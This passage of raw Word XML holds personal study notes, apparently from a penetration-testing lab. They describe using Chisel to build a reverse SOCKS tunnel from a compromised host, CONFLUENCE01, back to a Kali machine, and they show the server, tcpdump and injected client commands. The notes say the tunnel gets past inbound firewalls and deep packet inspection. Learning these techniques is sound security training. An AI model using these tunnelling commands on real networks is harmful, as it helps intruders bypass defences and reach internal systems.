          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Chisel client (CONFLUENCE01) will then decapsulate it and push it wherever it is addressed (in this case, it would be pushing it to PGDATABASE01, which is the target machine)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we are working with SOCKS Proxy, that means we can access any port on Target Machine, since it's like we are running commands from CONFLUENCE01 (Chisel Client), which can access any port on PGDATABASE01 directly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT NOTE TO MYSELF about</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse port forwarding for Chisel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="871"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inbound HTTP doesn't need to be allowed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — as long as CONFLUENCE01 can initiate one outbound HTTP connection to your Kali box, Chisel reverse port forwarding will work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="871"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All data going from Kali to the internal target is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tunneled through that outbound HTTP stream </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— so it evades both the inbound firewall and DPI restrictions. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="871"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Even the initial chisel tunnel initiation doesn't require any in-bound traffic, only outbound since the client connects to the server and that's it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="871"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There might be a two-way TCP handshake, but that "in-bound traffic" is allowed since it's a response to an outbound packet. Inbound packets that are related to outbound packets in that way are allowed through firewall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A02">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The traffic between the Chisel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">client </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is all </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP-formatted</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This means we can traverse the deep packet inspection solution regardless of the contents of each HTTP packet. The Chisel server on our Kali machine will listen on TCP port 1080, a SOCKS proxy port. All traffic sent to that port will be passed back up the HTTP tunnel to the Chisel client, where it will be forwarded wherever it's addressed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A04">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A05">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eqd9aoud521j" w:id="87"/>
      <w:bookmarkEnd w:id="87"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting Chisel to our Kali and CONFLUENCE01 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A07">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's get the Chisel server up and running on our Kali machine. In the usage guide, we find the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--reverse</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Starting the Chisel server with this flag will mean that when the client connects, a S</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OCKS proxy port will be bound on the server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (our kali)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before we start the server, we should </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">copy the Chisel client binary to CONFLUENCE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The Chisel server and client are run from the same binary, they're just initialized with either server or client as the first argument.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> If our target host is running a different operating system or architecture, we have to download and use the compiled binary for that specific operating system and architecture from the Chisel Github releases page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this case, both CONFLUENCE01 and our Kali machine are amd64 Linux machines. That means we can try to run the same chisel binary we have on our Kali machine on CONFLUENCE01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, they opened an APACHE Server on our Kali, and then used a payload on CONFLUENCE01 to download the Chisel binary hosted in our apache server. But, you can do the regular python hosting instead.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A11">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jkh9cv7ts8c1" w:id="88"/>
      <w:bookmarkEnd w:id="88"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A13">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we have the Chisel binary on both our Kali machine and the target, we can run them. On the Kali machine, we'll start the binary as a server with the server subcommand, along with the bind port (--port) and the --reverse flag to allow the reverse port forward.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1219200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="552" name="image546.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image546.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId206"/>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A16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1123"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel server --port 8080 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A17">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A18">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Chisel server starts up and confirms that it is listening on port 8080 and has reverse tunneling enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A19">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before we try to run the Chisel client, we'll run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our Kali machine to log incoming traffic. We'll start the capture filtering to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp port 8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to only capture traffic on TCP port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="812800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="478" name="image464.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image464.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId207"/>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A1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1189"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -nvvvXi tun0 tcp port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A1D">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll try to start the Chisel client using the injection, applying the server address and the port forwarding configuration options on the command line.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A1E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We want to connect to the server running on our Kali machine (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.118.4:8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), creating a reverse SOCKS tunnel (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">R:socks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> prefix specifies a reverse tunnel using a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxy (which is bound to port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default). The remaining shell redirections (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; /dev/null 2&gt;&amp;1 &amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) force the process to run in the background, so our injection does not hang waiting for the process to finish.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A1F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/chisel client 192.168.118.4:8080 R:socks &gt; /dev/null 2&gt;&amp;1 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1329"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the command we want CONFLUENCE01 to run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A21">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1329"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
